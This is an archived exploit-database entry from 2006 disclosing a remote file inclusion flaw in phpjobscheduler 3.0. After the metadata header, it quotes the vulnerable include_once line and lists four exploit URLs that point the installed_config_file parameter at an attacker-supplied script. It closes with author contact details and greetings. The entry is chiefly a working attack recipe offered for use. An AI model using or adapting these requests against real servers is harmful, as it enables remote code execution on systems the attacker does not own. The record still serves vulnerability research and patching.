Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion

Author: Firewall
type: webapps
platform: php
port: 
date_added: 2006-11-12 
date_updated:  
verified: 1 
codes: OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364 
tags: 
aliases:  
screenshot_url:  
application_url: 

======================================================================
# Phpjobscheduler 3.0  - Multiple Remote File Include by Firewall


# Application Affect:
                   phpjobscheduler 3.0

# Source Code:
                   http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip

# Code:
                   include_once($installed_config_file)

# ExPloit :
   http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]


# Contact:
                   Firewall1954@hotmail.com

# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

 "El ceviche y El pisco es peruano y jamas podran igualar su calidad"
                         "Viva el Peru"

======================================================================

# milw0rm.com [2006-11-13]